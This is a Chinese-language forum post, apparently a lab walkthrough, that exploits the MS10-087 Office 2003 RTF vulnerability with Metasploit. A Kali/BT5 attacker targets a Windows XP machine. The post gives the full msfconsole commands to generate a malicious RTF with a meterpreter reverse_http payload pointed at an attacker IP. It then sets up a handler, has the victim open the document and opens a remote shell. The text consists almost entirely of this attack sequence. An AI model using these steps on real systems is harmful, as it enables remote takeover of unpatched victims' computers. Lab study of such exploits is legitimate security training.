电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2519 人浏览分享

MS10_087 office 2003漏洞攻击

[复制链接]
2519 0
office 2003渗透攻击

实验环境

靶机是windows XP 攻击机是kali

实验步骤

靶机IP地址

172248kq14sqgxzz446wnf.png.thumb.jpg

攻击机IP地址

172250iptftipyyihyy6zm.png.thumb.jpg

  1. msf > search ms10_087
复制代码

100.jpg

  1. msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
复制代码

99.jpg

  1. msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
复制代码

98.jpg

  1. msf  exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_http
复制代码

97.jpg

  1. msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 211.100.66.128
复制代码

96.jpg

show options看一下

19.jpg

  1. msf  exploit(ms10_087_rtf_pfragments_bof) > exploit
复制代码

18.jpg

  1. root@bt:~# cp /root/.msf4/local/ms10087.rtf /root/ms10087.rtf
复制代码

16.jpg

12.png

将文档从BT5拷贝到WIN XP靶机上

172256ub3ycnuc3r6yy96y.png.thumb.jpg

  1. msf > use exploit/multi/handler
复制代码

12.jpg

  1. msf  exploit(handler) > set payload windows/meterpreter/reverse_http
  2. payload => windows/meterpreter/reverse_http
复制代码

11.jpg

msf  exploit(handler) >
msf  exploit(handler) > set LHOST 211.100.66.128
LHOST => 211.100.66.128

10.jpg

show options看一下

9.jpg

在靶机双击打开文件

8.png

  1. msf  exploit(handler) > exploit
复制代码

成功连接

8.jpg

  1. meterpreter > ipconfig
复制代码

6.jpg

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.